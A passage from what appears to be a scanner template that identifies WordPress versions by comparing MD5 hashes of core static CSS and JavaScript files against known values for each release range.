5.4.4 - dsl: - - "(\"8fa1e9aeea65384be3e4519e5e89e99c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"7667c530a7dec4836115d4114aedf41e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a9a8570f751efd8b473156a5e4f99812\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/theme-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"c05ede63e9bfee178e4307ae1b6d6075\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d3f34daa69b2ac3bf8a346f574a588d6\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"765597c3d810bb018d92c6c402830ee1\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"d957340764df5851005f336311a87847\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"1cd9fb2cd523d2d87e16057d2c86bf72\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4125aeb22a82ba5c411416c3f074b956\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"711f173f6b717396bfdd8900a48eb82e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/theme.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"48943d583062427bd919c60005f397b3\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"498c8501c2c4b1d56968fb2340da8d6e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8f30cb2e9f32a20cf62ff9d398ffd370\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"9a91ffe53383c017e8ee528fe876be37\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"557f9554d0253d59faffc62ddf5d443a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f33467abe97afabe4e76914e9904cd3e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"261b286370e6ebf2fea391d7b5992b82\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/format-library/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"11c31e9d289b83b5e77d72bac6727f8a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ca3d97822c24a367cdd7a5dbb89aa3e7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e083f88ed372b2060f14fba501cfabc3\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"963b64cb0a578fa061771df545c01d24\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"17ec8f8aeb2e2def5d1ebb954866c8b1\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d6b3349458d04440394db83f8b5619c2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3ceee3748d9e98acadbe2d5dd9157616\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/format-library/style.css" - matchers: - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"11c31e9d289b83b5e77d72bac6727f8a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ca3d97822c24a367cdd7a5dbb89aa3e7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"e083f88ed372b2060f14fba501cfabc3\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"cfd4cd3bcc251178896d6309b3bf16e3\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"9bec0aed392a71368af11b9d7c9924d9\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"973d49151bf1c6114103b255fe9bf541\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3b2d84d9a95082cccac3fa29cdd456ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-directory/style-rtl.css" - matchers: - - type: dsl - name: 5.4 - dsl: - - "(\"17083b7c4730dff09fa65894ee2614ff\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"58e2636e4747d7e549bd747542807dc4\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"54c87680ee00548dda2ac73d8bdfc089\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ba2c227c69ec307dc4314b1a47e30e7b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-directory/style.css" - matchers: - - type: dsl - name: 5.4 - dsl: - - "(\"7a6efade7acf587267923b9f9c7e9642\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"8bd1e8ce2c01b7819514b62b6d181c0f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"a9bd170afe04ea21dc5660bb612cf41e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"aef5b98fce25d6cb0618916949709a3a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/media.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"85c2128be6063d7c56e7a6db37e5fe3a\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"31bb9d767dc660883cbe4f139d4a1594\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"e51791f375ab1b37bc6a6b909117751b\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"d714e213588655321600965226ddc90d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"7ba8bad309cb85ad9bf541efd9125d50\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"c997f050f7bb25caf1818ea0f28ed4a4\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"e59229c4367889a9e11bf73a24322a21\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"678153b11dc1519f52d1d8272b3a3dda\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"60ec435acce0172de2eb1e32604be34d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"ecf181b81b6a1013ac735cc5e7e93214\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"356a27e870aa3c5e65150b03612edecc\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"8ebfa134dd4947ee27a27dc92096f8dc\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"fab4fc4dd4ac53e5cf57a9a34553b3f6\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"31a66201ba16acb7f87720cbb4f2ee90\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e1f6d60bbad12bbb2b3e4237dc429445\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"5a548eab236ffc874cb30cf285096c3d\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"dbd90a61312819a8356cfb4fe41017eb\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"416650f0eda7575e5b0c47c9002a88aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/media-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"62c7ce65509dfa3104449d4ddc09fa63\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"de0809f2c9675d09fe4f48b617a7e6a1\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"b13c8ab17b4b40a41ed606a6260c8a45\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"961e427859db7e72579d43e9180f75ac\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"c05627fb8b23d03a493634aea897fbb3\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"a3f07d2e699aff8d66db9352172f3c41\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"ed3c2887d54cf6fb64f55b03413502d0\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"3b139483643b8769ec041e86142f0b0c\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"f9b551130b9b64f5b772faf8601bd0b9\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"0fade283565e4a3ce4ec55de896791ed\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"5b46ede1ee578828803f29bad065bd2a\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"03387f19e695ffcce6b2bbcef4eacc3f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"1489f2a35f823f68c83976019fe84445\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"655c83f4842aefbb938674e7665adce9\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"ee4d04d2c5c499c1688ba37184e6f507\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c199a3e351b24d9a9f8a430d20e9140e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3ff0f57179a095756247065a3cdb13e2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/media-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"b6f1ebbe7e429a30e78b3e57194c2b99\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"d5fbbc80155b5414f2a4da9c852bb9c0\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"5f7e742e81a02e1181c35920268c8a51\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"73221f55eb1c209fe229f90739d83d37\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2220b30c104b1bfc28ce0d57294630ff\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"23aabbc47036a0feaaed7f25d4863cfb\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b5f2073fd98bf22e2f2b2353a2475f9f\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"ebdfa9a5981fc4adc6421b8c8f2fbdab\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"4987695c2fdde552b9723a7a23eb33a4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f79e045e230423e774bbc42b7a1a7085\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"2203b97d07d9fe77d9d39f2287e81c0f\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"ed5e5527b5bd5a5bca516e801dc1dc0b\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a3f07d2e699aff8d66db9352172f3c41\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d166fa753a4ac9638dfcc8b53a3b844c\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"dad7c0350214e95c8c1a79d35f45fec7\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"1abfd70d037a1e2dff56fcccf1f6ab10\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"b6c8a448b7deb1e19bf999ea1872b2e3\" == md5(body))" - - type: dsl - name: 2.7 - 2.8.6 - dsl: - - "(\"8d9762bb606d52329ce469823b56119d\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"22448b7afc80e35414de05dc7d648e0b\" == md5(body))" - - type: dsl - name: 2.5 - 2.6 - dsl: - - "(\"573f2f2acef97cb56ad89ef9a3817854\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"166984f6b0e07f10e505addb8197d0fc\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"954b5c4a4a4f15fac61f4fc17bf58e61\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e6379fac5e741a344df826d46d84e69a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"3df6ed7e42905e3c50cee2540641492e\" == md5(body))" - - type: dsl - name: 5.2.2 - 5.2.9 - dsl: - - "(\"f19d0ab7d3f70930a10cd4b041a6e6bd\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"845b45ebe24b66d634755bb35a4327fd\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"e59be28d8c4b1ddb2b5b0c7200d85556\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0b4b36860bd56854766cf368240db3a5\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"a45df3bb81bd0080863cf69e7f98546e\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"63c7307a8612335027f0fd90741a5777\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"308362946172efe2e4ec1a2255ac263c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-and-player.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"8970e6e672a1d312c8d8ef471ffb7d5f\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.5.23 - dsl: - - "(\"1490850465047bbde4cb3a08d257aa8e\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.1 - dsl: - - "(\"53972f85761d00c950a6554b55f46f29\" == md5(body))" - - type: dsl - name: 4.3.4 - 4.3.25 - dsl: - - "(\"7c839ada5992116eb525cabad56fec5a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.3 - dsl: - - "(\"1abc152ca7ae762a29ac997bc779a187\" == md5(body))" - - type: dsl - name: 4.2.8 - 4.2.29 - dsl: - - "(\"906a6c1b6d7568099ef0358ecafdd754\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.7 - dsl: - - "(\"a3a3353ab882870300207675fa6b1b83\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8240ce3d6dfd3ffaaa20d71c67b9e5dd\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"35a97e9df26614992044479b84cde48b\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"0015bf4818e9adf776ef6a35e791b855\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"89f8f0d4de00fe86d5a452bbb65bb02c\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"9075ef6303cc251092a0d6bfdd3a2093\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"0c279a4de1ca848917f96892e58345d2\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"c6d1f8e334ded732e83231a64de3fd3f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6de31d697a1b1b2b0e2a3b29b1fb458b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-pointer-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"4bd99a74dbfee792e9cde7c641ed51b7\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"456e10f2561e65f2b76c1985b657ebdb\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f2fbd40d135802525dedae9d5d02564e\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"6c3e135352318e69b359fc37bff0b3bc\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"5e414da7c33e52e8ee53ae20cc2c3bd8\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"84e05e2ca97a0e4c401ef3a99ae61bd9\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"83a66b2977cbedbb9ba412606f1f13c1\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"264b969d3c1ba2cc8eb3df7fe4feaaaf\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"73c9bdb9277ec76f0d6842368f0cddf6\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"013fb2b4de66e81cb7378f931fc93ffb\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"a35fbcb6a0ef77a051a7415a11eb6027\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"249e68e8463fc816b70c106ea7001355\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"bbbacea8c1892bf4c4fead1e460fead7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-pointer.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"e98bb215ae58020de55852487229119e\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"7e9fd782602ead0ddd91ecbe600bb078\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f073040db3f47a4718a1711018ae9980\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"f2c8a14e896d48cb9f2c3367228ef562\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"51b755f1d00ecfe6c97c681b712a1f79\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"b47a82b97d5d40971429a3cace9e8e24\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"3f78b74716ff99d6bc9f0101998d1633\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"2db0af168008dd4ba838cda3e111ebe4\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"09aba215976d5cba6afa711a1cd777f3\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"f4911a0d886fb507fac33870531837ce\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"981c69b911ff9d4432bf82c080cfc7c7\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"9ee1087f5cd30436a78f4ae1ef9e53ae\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"1663817600108d76e57fbcb708a272f3\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"bfbbb17f5deaa73a3fffb7c639aca12e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b33603a27d12bd346e305a15d175ea11\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-pointer.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"89df3c3fdb1a28e9553addd2c0a51e2e\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"82eeae4c68288d28c8809ef9fb1bc3ea\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"42634848a1d576496e3a3fcc4848aa08\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"3d7c74b9bf7260ded6960f7d7c3f1e9c\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"83fefeea5786545e775f25941e482d13\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"60071f8937b8c3fad00dc801e715fa45\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"8f3b6483f012f1d94891105a97acefcf\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"7e45d0e701aead8de6f0e9ab63b15741\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"5c863bd1b2e60bb2dbff75f1b6051b0f\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"59f806e4f2c05775d4716684d184bca2\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"dba6014d7ae5dad33ec8d7bad4d23d85\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"9f865744182beb7411b3ce6ab09a49db\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"8b0b4f07ee0da51fb5b48944e20b4c11\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d22ab774b9d7d1c7540d075a734baa89\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"799cbb233336f9dec91766a0a786c7c9\" == md5(body))" - - type: dsl - name: 5.3 - 5.5.3 - dsl: - - "(\"509195f639213b5e82163c84842a2fd8\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"87cc1bc8d497f0b0a5ce8124c0befda3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.js" - matchers: - - type: dsl - name: 4.5.3 - 5.0.4 - dsl: - - "(\"8610f03fe77640dee8c4cc924e060f12\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.2 - dsl: - - "(\"d2d3169ca79b3eabf7ca582222fbddd3\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"207abeb83412721d556faeba36e00822\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"4e2a6874f8b028fa23591492284a1643\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"25c76e632c1ee2f2d25292b72acc17d4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"9f78bc4ac0da184bdd6733ffa7e5e599\" == md5(body))" - - type: dsl - name: 3.6.1 - 3.8.35 - dsl: - - "(\"92c9ccfa9216499d48ecc11e6d9887d5\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"9dcde2d5e8aeda556a0c52239fa2f44c\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"baae1db8cca4abb2265b0a6e01f1beed\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"d2985bb2ef1e276824161ffb6fa91338\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"6f79194a85c68f4e3c325aba0eeebd63\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"24cdab29f8a402a6f8f55e69dc56e429\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"b600f5c9cc254ffca5501d2cfefa1a4a\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"518215c646beff570b8d9849429139d4\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"25e59325cb47d2ab5ea650d47f431a9c\" == md5(body))" - - type: dsl - name: 2.6 - 2.7.1 - dsl: - - "(\"5308064654748a85218f8cf04ac5f8e8\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"7cc62f895d635b404ae0a37c13dcd6c5\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"d5753af0d384857ca34bf8b54c5eb417\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"290a21c83be5e11f93b86ff1bf8d4cd2\" == md5(body))" - - type: dsl - name: 5.1 - 5.2 - dsl: - - "(\"bb33093a8d4f68199c4ab6702f3976e4\" == md5(body))" - - type: dsl - name: 5.1.2 - 5.5.3 - dsl: - - "(\"49edccea2e7ba985cadc9ba0531cbed1\" == md5(body))" - - type: dsl - name: 4.5.18 - 5.0.11 - dsl: - - "(\"dc5ba5044fccc0297be7b262ce669a7c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3bbf6f33a2484805c30cf0e4a4b1d526\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/sodium_compat/composer.json" - matchers: - - type: dsl - name: 5.2 - dsl: - - "(\"a3a1d156f395eb8f522dd29733e6f74d\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.3 - dsl: - - "(\"1969ec6eba483a0d2ba0672435bc086f\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.5.3 - dsl: - - "(\"81e61d0416ef452b86358743d7cebf7d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"60d50bd04e4b70407da0a8158a0d8f7c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-api.min.js" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"8ef51dc05352b2544201b31f7e2c2aa3\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.8 - dsl: - - "(\"5b04d3ac5a88211004528a50437a0b3c\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.4 - dsl: - - "(\"ba06e5f6f4f18e895c0c10ce1d3fef94\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"146b14e8c7935d8bd14eb521fb616a5e\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"632a0df5fc4f02477aa93f838530c4e0\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"ac19f388e35cadb800170d1e65928cce\" == md5(body))" - - type: dsl - name: 4.9.5 - 4.9.16 - dsl: - - "(\"cfe6bf3aec2963dbdcddb2daa7ed129c\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"8cf9672daeca232b3c1f93b1e8d130b0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b7d6e1947ae62e2bcf6973d884b1a105\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"99b1ca16bcc61ef31b8874a6a516532e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b75b493914b2c89b9361c6e79622b5c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-pointer-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"eafe3262c7b7af6d8c71850eef377b1c\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"8bb0bef9034c514f114e05ff9fc63840\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"5efef129253ea15d5742c8985a5e5acc\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"d7e0cd8698b0111eee1a6a5f8b4c924a\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"d1469cd4079832849dad2664ea765a40\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1ecc35e34576c2f9a22b31a04c05db4b\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"a2fdd3f6cecdad170c8b388b62451441\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"4711e5e8702a25a94284a833dd04cebf\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.5 - dsl: - - "(\"d7ab0fb6d3a327f2fc6502591566656e\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.0.11 - dsl: - - "(\"e186e8b2e5b4ad9ef0a083ca5886e1d7\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"f42570055f49a16bcb1217a556e3049f\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"9799a726551e5c0f2dc8721e0701057c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b8f963b6af881302043b3170e8ad78bb\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"c0a39227c87b13e72b44fa2cd9cfb548\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ed0285f2d68006a3cce1d14f213fd6c6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/data.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"f8150bf25c1f1038994b1b21d31db081\" == md5(body))" - - type: dsl - name: 5.0.2 - dsl: - - "(\"cec32f67b9c0c87140fa5506316ba63e\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"07c02f5b612470483def32a975cd96cf\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d3bbd3eea7bbe3508e81ebd69f2c45d2\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ae925003420ddd0a00ca0b9dede3911e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - 